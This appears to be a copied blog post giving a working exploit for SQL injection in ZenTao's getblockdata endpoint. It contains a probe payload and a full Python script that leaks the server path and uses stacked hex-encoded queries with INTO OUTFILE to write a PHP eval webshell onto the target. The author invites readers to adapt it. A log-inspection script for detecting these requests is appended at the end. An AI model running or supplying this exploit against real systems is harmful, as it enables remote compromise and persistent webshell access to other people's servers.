
2024/10/19 22:12:08  Source: https://blog.csdn.net/qq_54030686/article/details/142898609

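The details are not shown here; the exp is only modified slightly to handle the case where the PoC returns no echoed output.
jas502n/zentao-getshell
When this error-triggering PoC is sent, the error message reveals the server path, and a file is then written to the corresponding directory. If the response has no echoed output, the next step of exploitation cannot proceed.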

{"orderBy":"order limit 1,1'","num":"1,1","type":"openedbyme"}

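Instead, fuzz the default paths directly and write the file. Of course, if a phpinfo page exists, the server path can be read from it and the file written directly.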

```python
# coding=utf-8
import requests
import base64
import re
import sys
import random
import string
import json
from fake_useragent import UserAgent

banner = '''usage: python exp.py http://127.0.0.1:81/
'''
print(banner)


def urlwrite(url,get_shell):
    hex_str = get_shell.encode('hex')
    payload1 = '''{"orderBy":"order limit 1;SET @SQL=0x%s;PREPARE pord FROM @SQL;EXECUTE pord;-- -","num":"1,1","type":"openedbyme"}''' % hex_str
    getshell_url = url + "/zentao/index.php?m=block&f=main&mode=getblockdata&blockid=case&param=" + base64.b64encode(payload1)
    headers = {"Referer": "%s/zentao" %url,"User-Agent": new_ua}
    r1 = requests.get(url=getshell_url, headers=headers)
    if r1.status_code == 200:
        webshell = url + "/zentao/" + filename
        r2 = requests.get(url=webshell)
        if r2.status_code == 200 and 'aaa' in r1.content:
            print("\n\n>>>>Webshell: \n%s" % webshell)
        else:
            print("写入失败")
    else:
        print("写入失败")


def get_web_dir(url, filename):
    if url[-1] == '/':
        url = url[:-1]
    else:
        url = url
    payload = '''{"orderBy":"order limit 1,1'","num":"1,1","type":"openedbyme"}'''
    base64encode_str = base64.b64encode(payload)
    web_dir = url + "/zentao/index.php?m=block&f=main&mode=getblockdata&blockid=case&param=" + base64encode_str
    version_url = url + "/zentao/index.php?mode=getconfig"
    r0 = requests.get(url=version_url)
    json_str = json.loads(r0.text)
    print("Cuurent Version= " + json_str['version'])
    headers = {"Referer": "http://127.0.0.1:81/zentao","User-Agent": new_ua}
    r = requests.get(url=web_dir, headers=headers)
    if r.status_code == 200 and 'SELECT' in r.content:
        print('\n')
        m = re.compile(r'.*in <strong>(.*)</strong> on')
        www_dir = m.findall(r.content)[0]
        www_root = www_dir.replace('\\', "//")
        print(www_root)
        m = re.compile(r'(.*)framework', re.DOTALL)
        # print '>>>>WWWROOT INSTALL: ' +
        get_shell = "select '<?php echo 'aaa';?>' into outfile '%s'" % (m.findall(www_root)[0] + 'www//' + filename)
        print('\n%s\n' % get_shell)
    elif r.status_code == 200:
        for i in ["C","D","E"]:
            get_shell = "select '<?php @eval($_POST[1])?>' into outfile %s:\\zentao\\xampp\\zentao\\www\\%s" %(i,filename)
            print('\n%s\n' %get_shell)
    else:
        print("出错")
    urlwrite(url,get_shell)


if __name__ == "__main__":
    url = sys.argv[1]
    characters = string.ascii_lowercase + string.digits
    filename = random_string = ''.join(random.choice(characters) for _ in range(5))
    ua = UserAgent()
    new_ua = ua.random
    if url:
        get_web_dir(url, filename)
    else:
        print("url为空")
```

Modify as appropriate; this is only a detection script. In practice, just change the path and the file that is written.
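A defender-side check for the requests this script sends, as an added example that is not part of the original post: it decodes the base64 `param` of `getblockdata` requests in a web access log, reports any `orderBy` outside an allow-list, and decodes hex literals so the embedded SQL is visible. The log format, the sample lines, the allow-list pattern (including the benign value `id_desc`) and the function names are assumptions constructed for illustration.

```python
import base64, json, re
from urllib.parse import urlsplit, parse_qs

# Assumption: a legitimate orderBy is a bare identifier such as "id_desc".
SAFE_ORDER_BY = re.compile(r"^[A-Za-z0-9_]*$")
HEX_LITERAL = re.compile(r"0x((?:[0-9a-fA-F]{2})+)")
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def inspect_line(line):
    """Return None for unrelated or benign requests, else a finding dict."""
    m = REQUEST.search(line)
    if not m:
        return None
    qs = parse_qs(urlsplit(m.group(1)).query)
    if qs.get("m") != ["block"] or qs.get("mode") != ["getblockdata"] or "param" not in qs:
        return None
    raw = qs["param"][0].replace(" ", "+")  # an unescaped '+' is parsed as a space
    try:
        decoded = base64.b64decode(raw + "=" * (-len(raw) % 4)).decode("utf-8", "replace")
        order_by = str(json.loads(decoded).get("orderBy", ""))
    except (ValueError, AttributeError):  # bad base64, bad JSON, or JSON that is not an object
        return {"reason": "undecodable param", "orderBy": None, "embedded_sql": []}
    if SAFE_ORDER_BY.match(order_by):
        return None
    # Decode hex literals so the analyst sees the statement hidden from plain-text log searches.
    embedded = [bytes.fromhex(h).decode("utf-8", "replace") for h in HEX_LITERAL.findall(order_by)]
    return {"reason": "orderBy outside allow-list", "orderBy": order_by, "embedded_sql": embedded}

def _sample(payload):
    """Build one constructed access-log line (combined log format) for the demo."""
    p = base64.b64encode(json.dumps(payload, separators=(",", ":")).encode()).decode()
    return ('203.0.113.7 - - [19/Oct/2024:22:12:08 +0800] "GET /zentao/index.php?m=block&f=main'
            '&mode=getblockdata&blockid=case&param=' + p + ' HTTP/1.1" 200 512')

# Constructed sample input: a benign value, the error probe from this page, and the
# stacked-query shape from the script with a harmless hex-encoded statement.
SAMPLES = [
    _sample({"orderBy": "id_desc", "num": "1,1", "type": "openedbyme"}),
    _sample({"orderBy": "order limit 1,1'", "num": "1,1", "type": "openedbyme"}),
    _sample({"orderBy": "order limit 1;SET @SQL=0x" + b"select 1".hex()
             + ";PREPARE pord FROM @SQL;EXECUTE pord;-- -", "num": "1,1", "type": "openedbyme"}),
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(inspect_line(line))
```

A hit on the stacked-query shape is a cue to review the web root for files created around the time of the request.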
